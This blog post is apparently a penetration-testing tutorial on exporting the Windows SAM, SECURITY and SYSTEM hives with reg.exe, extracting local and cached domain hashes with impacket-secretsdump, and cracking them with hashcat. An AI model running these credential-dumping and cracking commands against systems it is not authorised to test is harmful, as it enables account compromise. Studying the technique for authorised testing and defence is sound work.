How to export/crack SAM database with internal Windows tools if you do not have access to mimikatz / hashdump / metasploit. As a bonus we also look at cached domain hashes. #LINUX4HACKERS #HASHCAT #LINUX #INFOSEC #HACKING #PENTEST #PENTESTING #REDTEAM #NVIDA #TESLAM60


I wanted to dump hashes on a Windows 10 box without any external tools. This is how I did it.

We start at first with the short version

  1. Export SAM with reg.exe
  2. Convert SAM with impacket-secretsdump to get to the hashes
  3. Use hashcat to crack the hashes

We start first with exporting the sam database with reg.exe

reg.exe save hklm\sam c:\tmp\
reg.exe save hklm\security c:\tmp\
reg.exe save hklm\system c:\tmp\

It is time to get the hashes out from these files.

Transfer the files to machine that have impacket installed. We need to extract the hashes from these 3 files. I use impacket-secretdump and the output is roger.hash

impacket-secretsdump -sam ./ -security ./ -system ./ LOCAL > roger.hash

Now we have a file roger.hash that have local accounts and cached domain haches.

Use hashcat to crack the hashes

For local accounts we copy the hashes into a file local.hash.

For cached accounts we do the same. As you can see we remove the domain and stuff so that the line begins with C2$

Now it is time to crack the hashes. For local accounts we use -m 1000 for cached accounts we use -m 2100

Cached account with password file

hashcat -m 2100 ./cached.hash /usr/share/wordlists/rockyou.txt

Cached account with brute force without any mask (guess.mask)

hashcat -m 2100 -a 3 ./cached.hash 

The same for local except mode is -m 1000

I hope this help someone out there!

Keep hacking!



Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Blog at

Up ↑

%d bloggers like this: